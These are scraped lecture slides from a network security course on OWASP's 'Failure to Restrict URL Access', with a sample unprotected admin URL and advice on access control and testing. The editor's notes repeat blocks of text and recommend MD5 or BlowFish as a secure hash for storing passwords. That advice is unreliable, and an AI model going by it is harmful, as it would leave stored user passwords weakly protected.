IFETCE/M.E CSE/NE7202-NIS/Unit 4 43
44. A10. Failure to Restrict URL AccessA10. Failure to Restrict URL Access
When the application fails to restrict access
to administrative URLs, the attacker can by
type in the URL’s into the browser.
Surprisingly common, for example:
◦ Add_account_form.php - checks for admin access
before displaying the form.
◦ Form then posts to add_acct.php which does the
work, but doesn’t check for admin privileges!
Consistent URL access control has to be
carefully designed.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 44
45. A10. Failure to Restrict URL Access : ProtectionA10. Failure to Restrict URL Access : Protection
Start Early!
Create an application specific security policy during
the requirements phase.
Document user roles as well as what functions and
content each role is authorized to access.
Specifying access requirements up front allows
simplification of the design
If you access control is not simple it won't be secure.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 45
46. A10. Failure to Restrict URL Access:A10. Failure to Restrict URL Access:
Protection (2)Protection (2)
Test Thoroughly!
Conduct extensive regression testing to ensure the
access control scheme cannot be bypassed
Test all invalid access attempts as well as valid access.
Don't follow the normal application flow.
Verify that all aspects of user management have been
taken under consideration including scalability and
maintainability.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 46
47. SummarySummary
Application Security starts with the Architecture
and Design
Security can’t be added on later without re-
designing and rewriting
Custom code often introduces vulnerabilities
Application vulnerabilities are NOT prevented by
traditional security controls.
Don’t invent your own security controls
Design, Design, Design, code, test, test, test
IFETCE/M.E CSE/NE7202-NIS/Unit 4 47
Editor's Notes
Even valid authentication schemes can be undermined by flawed account management functions including:
account update
forgotten passwords
change password, and other similar functions
Active session management requires a strong session id that cannot be captured, hijacked, or guessed.
passwords should never be stored in plain text within the application.
It’s surprising how many times developers will try put password in code or a configuration file in clear text.
Passwords should always be stored in either hashed (preferred) or possible an encrypted form.
A secure Hash is preferred (such as MD5 or BlowFish) as it’s not reversible.
The problem with using symmetric encryption to store a password is that it requires another password for the encryption. Now how do you hide the password to the password…
Even valid authentication schemes can be undermined by flawed account management functions including:
account update
forgotten passwords
change password, and other similar functions
Active session management requires a strong session id that cannot be captured, hijacked, or guessed.
Even valid authentication schemes can be undermined by flawed account management functions including:
account update
forgotten passwords
change password, and other similar functions
Active session management requires a strong session id that cannot be captured, hijacked, or guessed.